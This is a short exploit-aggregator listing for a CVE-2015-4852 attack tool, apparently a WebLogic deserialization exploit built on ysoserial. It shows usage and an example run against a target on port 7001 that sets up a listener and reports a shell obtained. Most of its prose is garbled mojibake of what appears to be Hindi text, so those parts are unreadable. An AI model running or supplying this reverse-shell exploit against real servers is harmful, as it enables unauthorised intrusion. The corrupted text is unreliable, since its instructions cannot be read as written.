## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-NEX1LESS-CVE-2015-4852
# CVE-2015-4852
рдкреВрд░реНрд╡рд╛рдкреЗрдХреНрд╖рд╛: ysoserial.jar рдХреЛ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ рд░рдЦреЗрдВ (ysoserial-0*.jar рдХрд╛ рдирд╛рдо рдмрджрд▓рдХрд░ ysoserial.jar рдХрд░реЗрдВ)ред рдЗрд╕ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреЛ рдЪрд▓рд╛рдиреЗ рдХреЗ рд▓рд┐рдП kali linux рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рдмреЗрд╣рддрд░ рд╣реИред
1. рдЙрдкрдпреЛрдЧ рд╡рд┐рдзрд┐:
root@kali:~# python3 CVE-2015-4852.py -h
Usage: python CVE-2015-4852.py -t/--target 1.1.1.1 7001
Options:
-h, --help рд╕рд╣рд╛рдпрддрд╛ рд╕рдВрджреЗрд╢ рджрд┐рдЦрд╛рдПрдБ рдФрд░ рдмрд╛рд╣рд░ рдирд┐рдХрд▓реЗрдВ
-t TARGET, --target=TARGET ip рдкреЛрд░реНрдЯ
2. рдЙрджрд╛рд╣рд░рдг:
root@kali:~# python3 CVE-2015-4852.py -t 10.6.214.129 7001
рд╕реБрдирдиреЗ рдХрд╛ рдЖрдИрдкреА рдкрддрд╛ рджрд░реНрдЬ рдХрд░реЗрдВ: 10.6.214.1
рд╕реБрдирдиреЗ рдХрд╛ рдкреЛрд░реНрдЯ рджрд░реНрдЬ рдХрд░реЗрдВ: 7777
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
рдирд┐рд╖реНрдкрд╛рджрди рд╕рдлрд▓
рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рд╣реБрдЖ